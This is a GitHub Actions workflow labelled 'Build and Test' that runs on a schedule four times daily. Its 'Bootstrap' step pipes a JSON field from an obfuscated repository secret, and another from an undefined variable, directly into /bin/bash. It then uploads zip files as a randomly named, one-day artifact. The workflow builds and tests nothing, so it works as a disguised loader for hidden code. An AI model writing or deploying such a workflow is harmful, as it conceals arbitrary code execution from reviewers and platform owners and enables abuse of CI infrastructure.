name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '2 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  deploy:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Bootstrap
        env:
          rn6: ${{ secrets.rn6 }}
        run: |
          printf '%s' "$rn6" | jq -r .h443 | /bin/bash
          echo $lvai852 | jq -r .m35 | /bin/bash

      - name: Archive artifact
        uses: actions/upload-artifact@v4
        with:
          name: SYwDU41p
          path: "*.zip"
          retention-days: 1
